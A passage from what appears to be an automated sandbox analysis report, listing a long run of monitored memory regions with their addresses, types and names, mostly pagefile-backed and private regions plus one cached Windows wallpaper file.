entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6691 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6692 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6693 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6694 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6695 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6696 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6697 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6698 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6699 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6700 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6701 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6702 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6703 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6704 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6705 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6706 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6707 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6708 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6709 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6710 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6711 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6712 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6713 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6714 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6715 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6716 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6717 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6718 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6719 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6720 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6721 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6722 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6723 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6724 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6725 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6726 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6727 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6728 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6729 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6730 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6731 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6732 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6733 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6734 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6735 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6736 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6737 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6738 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6739 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6740 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6741 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6742 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6743 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6744 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6745 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6746 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6747 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6748 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6749 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6750 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6753 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6754 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6755 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6756 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6757 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6758 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6759 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6760 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6761 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6762 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6763 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6764 start_va = 0x54a0000 end_va = 0x5509fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 6765 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6766 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6767 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 6768 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6769 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6770 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6771 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6772 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6773 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6774 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6775 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6776 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6777 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6778 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6779 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6780 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6781 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6782 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6783 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6784 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6785 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6786 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6787 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6788 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6789 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6790 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6791 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6792 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6793 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6794 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6795 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6796 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6797 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6798 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6799 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6800 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6801 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6802 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6803 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6804 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6805 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6806 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6807 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6808 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6809 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6810 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6811 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6812 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6813 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6814 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6815 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6816 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6817 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6818 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6819 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6820 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6821 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6822 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6823 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6824 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6825 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6826 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6827 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6828 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6829 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6830 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6831 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6832 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6833 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6834 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6835 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6836 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6837 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6838 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6839 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6840 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6841 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6842 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6843 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6844 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6845 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6846 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6848 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6849 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6850 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6852 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6853 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6854 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6855 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6856 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6857 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6858 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6859 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6860 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6861 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6862 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6863 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6864 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6865 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6866 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6867 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6868 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6869 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6870 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6871 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6872 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6873 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6874 start_va = 0x610000 end_va = 0x61efff monitored = 1 